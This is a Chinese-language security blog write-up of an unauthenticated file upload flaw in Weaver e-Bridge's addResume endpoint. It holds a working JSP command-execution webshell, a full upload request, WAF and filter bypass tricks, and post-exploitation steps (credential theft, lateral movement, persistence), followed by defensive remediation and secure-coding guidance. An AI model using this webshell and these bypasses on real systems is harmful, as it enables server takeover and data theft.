1. 项目概述从一次内部渗透测试说起前段时间在做一个常规的内部安全评估目标是一个使用了泛微e-Bridge云桥系统的企业。e-Bridge这东西很多中大型企业都用它来做内外网数据交换和集成算是个“枢纽”。在测试过程中我习惯性地会对这类中间件、网关性质的系统进行重点关照因为它们往往权限高、数据流复杂是攻击者眼中的“黄金跳板”。果不其然在对/tass/upload/uploadFile、/tass/servlet/这类常见路径进行模糊测试时没发现什么。但当我将视线转向人力资源相关的接口时一个名为addResume的接口引起了我的注意。简历上传这听起来就是个文件操作点。经过一系列测试最终确认这里存在一个无需身份验证的任意文件上传漏洞攻击者可以直接上传Webshell进而控制整个e-Bridge服务器。这个漏洞的原理并不复杂但危害极大因为它位于内外网数据交换的关键节点上一旦被利用相当于给攻击者打开了一扇通往内网核心区域的大门。今天我就把这个漏洞的发现过程、原理分析、复现细节以及更深层次的防御思考完整地拆解一遍。无论你是安全研究人员、企业运维还是开发人员理解这个漏洞都能帮你更好地审视自身系统的文件上传安全。2. 漏洞原理深度剖析为何addResume接口“失守”要理解这个漏洞我们得先看看addResume接口在设计上可能存在的逻辑问题。泛微e-Bridge的云桥模块其一个核心功能就是处理来自外网如招聘网站的简历数据并同步到内网的OA或HR系统。addResume接口很可能就是为这个场景服务的。2.1 理想的安全上传流程一个健壮的文件上传接口至少应该包含以下几个校验环节它们共同构成一个“防御纵深”身份认证与授权校验首先确认请求者是否有权限上传简历。这通常通过Session、Token或与调用方系统的白名单IP认证来完成。业务逻辑校验检查上传的数据包是否符合“简历”的格式。例如除了文件本身可能还需要附带候选人姓名、职位等元数据字段。文件内容校验这是最关键的一环又分为多个子步骤文件类型校验白名单不仅检查HTTP请求中的Content-Type如image/jpeg更要对文件内容的真实格式进行校验。例如通过读取文件头Magic Number判断它确实是PDF、DOC或图片并且只允许这些安全的业务类型。绝对禁止仅凭文件扩展名如.jpg做判断。文件内容安全扫描对上传的文件进行病毒、恶意代码扫描。文件重命名服务器端使用不可预测的规则如UUID、时间戳随机数对文件进行重命名避免攻击者直接访问上传的文件。非Web目录存储将上传的文件保存在Web服务器根目录以外的路径并通过一个安全的下载脚本如download.php?idxxx来提供访问确保用户无法直接通过URL执行上传的文件。文件大小与数量限制防止资源耗尽攻击DoS。2.2 漏洞接口的缺陷假设根据漏洞现象反推addResume接口的实现很可能在多个环节上出现了严重缺失或错误形成了“链式失效”缺陷一认证/授权绕过。接口可能被设计为“默认信任”来自特定前置系统或网络的请求但认证逻辑存在缺陷。例如它可能只是简单检查了某个HTTP头如Referer或自定义头是否存在或包含特定值而这个值可以被攻击者轻易伪造。更糟糕的情况是接口可能根本就没做任何认证认为该接口只会被内部系统调用从而暴露在了公网上。缺陷二文件类型校验形同虚设。这是导致“任意文件上传”的直接原因。代码可能只做了非常初级的检查比如仅检查扩展名攻击者将一个Webshell如shell.jsp改名为resume.jpg由于后端代码只校验了文件名以.jpg结尾便予以放行。Content-Type校验可被绕过攻击者在Burp Suite中直接修改请求的Content-Type为image/jpeg即可轻松绕过。缺乏真正的文件头校验没有对文件内容的实际格式进行验证使得一个伪装成图片的PHP/JSP文件得以蒙混过关。缺陷三存储路径与文件名可控。接口可能允许客户端指定文件的存储路径和文件名通过filename参数或路径参数或者使用了客户端提供的文件名而未做净化。这使得攻击者可以精确地将Webshell上传到Web可访问的目录如/webapps/下的某个子目录并使用.jsp或.php这样的可执行扩展名。缺陷四错误的安全依赖。开发者可能过度依赖WAFWeb应用防火墙或前端校验。他们认为前端上传组件已经做了文件类型过滤或者公司部署的WAF能够拦截恶意请求从而在后端放松了警惕。然而攻击者可以直接构造HTTP请求包完全绕过前端JavaScript校验而WAF的规则可能无法覆盖所有变形的攻击payload。注意在真实漏洞分析中我们通常需要反编译或直接审计Java代码e-Bridge通常用Java开发来确认具体缺陷。但基于黑盒测试和漏洞复现的现象上述缺陷组合是导致此类漏洞的典型原因。3. 漏洞环境搭建与复现实操分析原理是为了更好地复现和验证。下面我们搭建一个模拟环境来亲手触发这个漏洞。请注意所有操作请在完全隔离的虚拟机或合法授权的靶场中进行严禁对任何未授权系统进行测试。3.1 环境准备与目标识别首先你需要一个存在漏洞的泛微e-Bridge测试环境。这通常可以通过以下方式获得官方历史版本安装包在授权测试中可能使用企业提供的测试系统。漏洞靶场环境一些开源漏洞靶场或演练平台可能集成了该漏洞场景。Docker漏洞环境安全研究人员有时会制作并分享漏洞环境的Docker镜像。假设我们已经获得了一个部署在http://192.168.1.100:8080的测试系统。第一步信息收集使用浏览器或工具访问目标查看页面特征、错误信息确定其确实是泛微e-Bridge。然后使用目录扫描工具如dirsearch、ffuf探测接口路径。python3 dirsearch.py -u http://192.168.1.100:8080 -e jsp,do,action,json在扫描结果中我们重点关注/tass/、/services/、/api/、/weaver/等泛微常见路径。最终我们发现了疑似接口http://192.168.1.100:8080/tass/upload/addResume或类似路径。3.2 构造攻击请求包由于是任意文件上传我们直接使用multipart/form-data格式上传一个Webshell。这里以JSP WebShell为例因为它常见于Java应用。制作WebShell文件 (shell.jsp):% if(pass.equals(request.getParameter(pwd))){ java.io.InputStream in Runtime.getRuntime().exec(request.getParameter(cmd)).getInputStream(); int a -1; byte[] b new byte[2048]; out.print(pre); while((ain.read(b))!-1){ out.println(new String(b)); } out.print(/pre); } %这是一个非常简单的JSP Shell通过pwd参数认证执行cmd参数传入的系统命令。使用Burp Suite构造攻击请求拦截浏览器访问e-Bridge任何一个页面的请求。将请求发送到Burp的Repeater模块。修改请求方法为POSTURL指向发现的addResume接口。修改请求头设置Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABC123boundary可以自定义。在请求体中手动编写multipart数据POST /tass/upload/addResume HTTP/1.1 Host: 192.168.1.100:8080 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABC123 Content-Length: [计算后的长度] ------WebKitFormBoundaryABC123 Content-Disposition: form-data; namefile; filenameshell.jsp Content-Type: image/jpeg % if(pass.equals(request.getParameter(pwd))){ java.io.InputStream in Runtime.getRuntime().exec(request.getParameter(cmd)).getInputStream(); int a -1; byte[] b new byte[2048]; out.print(pre); while((ain.read(b))!-1){ out.println(new String(b)); } out.print(/pre); } % ------WebKitFormBoundaryABC123--关键点分析namefile这个字段名需要根据实际接口定义猜测可能是file、uploadFile、resumeFile等。如果不对需要尝试或从前端HTML源码中寻找线索。filenameshell.jsp我们直接使用.jsp扩展名测试后端是否做扩展名过滤。Content-Type: image/jpeg我们将JSP文件伪装成JPEG图片类型测试后端是否仅校验此头。请求体最后一行必须是boundary加上--作为结束。3.3 漏洞触发与结果验证发送构造好的请求。观察服务器的响应成功响应漏洞存在服务器可能返回一个JSON响应包含success: true、filePath: /upload/202405/shell.jsp或类似字段。这个filePath就是上传后的访问路径失败响应可能返回错误信息如invalid file type、unauthorized等。这时我们需要调整攻击载荷尝试修改filename为shell.jpg但文件内容仍是JSP代码。尝试在JSP代码前添加合法的图片文件头如GIF89a制作图片马。尝试添加或修改其他表单字段如userid、type等这些字段名可能需要从前端JS或历史漏洞报告中获取。假设我们收到成功响应并得到了文件路径/upload/202405/shell.jsp。验证WebShell浏览器访问http://192.168.1.100:8080/upload/202405/shell.jsp?pwdpasscmdwhoami如果页面返回了服务器当前用户的用户名如nt authority\system或root则证明漏洞利用成功我们获得了服务器的命令执行权限。3.4 利用场景扩展拿到Webshell只是第一步。在e-Bridge这种枢纽系统上攻击者可以进行深度利用内网探测利用Webshell执行ipconfig /allWindows或ifconfigLinux、netstat -an命令查看服务器网络配置和连接绘制内网拓扑。凭证窃取在服务器上查找配置文件如jdbc.properties、config.xml获取数据库密码。Java应用可能从WEB-INF/classes目录或环境变量中读取配置。横向移动e-Bridge通常需要连接内网的数据库、OA服务器、AD域等。攻击者可以利用窃取的凭证以e-Bridge服务器为跳板向内网核心系统发起攻击。持久化后门上传更多功能强大的Webshell或创建计划任务、系统服务维持长期控制。4. 漏洞挖掘与测试中的核心技巧在实战中挖掘此类漏洞需要系统性的方法和一些“骚操作”。4.1 接口发现与模糊测试不要只盯着addResume。使用以下方法扩大攻击面字典生成结合“上传”、“文件”、“upload”、“file”、“save”、“import”、“add”、“resume”、“avatar”、“attach”等关键词生成接口路径字典。参数爆破对于已发现的接口使用wfuzz或ffuf对参数名进行模糊测试也许存在filename、path、type等可控参数。ffuf -w param_dict.txt -X POST -d FUZZtestfileshell.jpg -u http://target/known/endpoint -H Content-Type: multipart/form-data -fr error源码泄露尝试访问/.git/、/WEB-INF/classes/、/WEB-INF/web.xml、/WEB-INF/lib/等路径如果存在源码泄露可以直接分析Java代码寻找文件上传逻辑。4.2 绕过常见防御手段的技巧现代应用可能会部署一些基础防御测试时需要尝试绕过防御手段绕过思路实操示例扩展名黑名单1. 尝试大小写SheLL.Jsp2. 尝试特殊扩展名.jspx,.jspf3. 尝试双重扩展名shell.jpg.jsp4. 在扩展名后加空格、点、::$DATAWindowsfilenameshell.jSpfilenameshell.jspxfilenameshell.jpg .jspContent-Type校验直接修改请求中的Content-Type头为白名单值。将Content-Type: application/x-php改为Content-Type: image/gif文件头校验Magic Number在恶意文件开头添加合法的文件头。在PHP Shell前加GIF89a在JSP Shell前加\xff\xd8\xff\xe0JPEG头。需注意不影响脚本解析。文件内容关键字过滤1. 字符串编码/混淆如Base64、Hex、Rot132. 使用反射、类加载等动态特性3. 拆分关键字如exe拆成ex.eJSP中使用% new String(new byte[]{...}) %解码后执行。WAF拦截1. 修改请求方法GET/POST转换2. 分块传输编码Chunked3. 畸形请求参数污染、多个Content-Type4. 使用冷门标签或属性使用Transfer-Encoding: chunked对请求体进行分块。实操心得在测试文件上传时我习惯准备一个“测试套件”里面包含各种变形后的Webshell文件如shell.jpg.php,shell.php%00.jpg, 带GIF头的shell.gif等以及一个用于快速生成不同格式请求的Python脚本这能极大提高测试效率。5. 从漏洞修复到安全开发闭环找到漏洞并复现不是终点如何修复和避免才是关键。这里从防御者角度给出系统性建议。5.1 紧急修复方案如果企业正在使用受影响的泛微e-Bridge版本应立即采取以下措施临时缓解在WAF或网关设备上对包含addResume的URL路径设置严格的访问控制策略例如只允许来自可信IP地址如HR系统服务器的访问并阻断所有包含.jsp、.jspx、.php、.asp等可执行扩展名的上传请求。官方补丁立即联系泛微官方获取该漏洞对应的安全补丁并紧急部署。这是最根本的解决方法。漏洞排查检查服务器upload、tass/upload等目录下是否存在近期创建的异常.jsp、.jspx、.war文件。检查Web日志搜索addResume请求记录看是否有来自异常IP的访问。5.2 安全开发规范针对文件上传功能对于开发人员必须将以下规范融入SDLC软件开发生命周期1. 采用“白名单文件头校验”双重验证机制// 伪代码示例 public boolean isSafeFile(MultipartFile file) { // 1. 白名单扩展名 String[] allowedExt {pdf, doc, docx, jpg, png}; String originalFilename file.getOriginalFilename(); String ext getFileExtension(originalFilename).toLowerCase(); if (!Arrays.asList(allowedExt).contains(ext)) { return false; } // 2. 文件头Magic Number校验 byte[] fileHeader readFileHeader(file.getInputStream(), 20); // 读取前20字节 if (ext.equals(jpg) !isJpegHeader(fileHeader)) { return false; } if (ext.equals(pdf) !isPdfHeader(fileHeader)) { return false; } // ... 其他类型校验 return true; }2. 强制服务器端重命名与非Web目录存储// 生成随机文件名避免猜测 String savedFileName UUID.randomUUID().toString() . safeExt; // 存储在Web根目录之外的路径如 /opt/app/uploads/ Path savePath Paths.get(/opt/app/uploads/, savedFileName); Files.copy(file.getInputStream(), savePath, StandardCopyOption.REPLACE_EXISTING); // 在数据库中记录 savedFileName 与原始文件名 originalFilename 的映射关系3. 实现安全的文件访问与下载不要提供直接的文件链接如/uploads/xxx.jpg。通过一个安全的下载控制器Servlet来代理访问GetMapping(/downloadFile) public void downloadFile(RequestParam String fileId, HttpServletResponse response) { // 1. 根据fileId从数据库查询真实存储路径 savedFilePath 和 原始文件名 originalFileName // 2. 可选进行权限校验如当前用户是否有权下载此文件 // 3. 设置响应头 response.setContentType(application/octet-stream); response.setHeader(Content-Disposition, attachment; filename\ originalFileName \); // 4. 将 savedFilePath 的文件流写入 response.getOutputStream() }这样用户访问的URL是/downloadFile?fileIdabc123而非直接的文件路径彻底杜绝了直接执行上传文件的可能性。4. 对上传文件进行静态恶意代码扫描在文件保存前调用防病毒引擎API或开源恶意文件检测库如ClamAV对文件内容进行扫描。5. 严格的输入验证与最小权限原则对所有客户端提供的参数包括文件名、路径变量进行严格的净化过滤../、..\、%00空字节等路径遍历字符。运行Web服务器的操作系统账户应具有最小权限仅能读写必要的目录绝不能以root或Administrator权限运行。5.3 企业安全运维建议资产梳理与漏洞管理建立完善的软件资产清单明确所有系统中使用的中间件、组件的名称和版本。订阅相关厂商的安全公告及时评估漏洞影响。纵深防御不要依赖单一安全措施。在网络边界部署WAF、IPS在主机层部署HIDS主机入侵检测系统监控Web目录下的文件创建行为定期进行安全漏洞扫描与渗透测试。日志审计与监控集中收集并分析Web访问日志、系统日志。为/upload/*、*.jsp等关键路径和文件的访问行为设置告警规则及时发现异常请求。最小化暴露面如非必要不应将e-Bridge这类管理、集成系统的Web界面直接暴露在互联网。应通过VPN或零信任网络网关进行访问。这个addResume漏洞是一个典型的多层安全机制缺失案例。它提醒我们安全是一个整体任何一个环节的疏忽都可能导致全线崩溃。作为防御方我们需要用攻击者的思维来审视自己的系统构建从代码开发到运维监控的完整安全闭环。而作为研究人员或测试人员深入理解漏洞原理掌握系统性的测试方法才能更有效地发现潜在风险。在实战中我往往会用一个检查清单来遍历整个文件上传功能从接口发现、请求构造、防御绕到深入利用这套方法论远比记住一个单独的漏洞payload要有价值得多。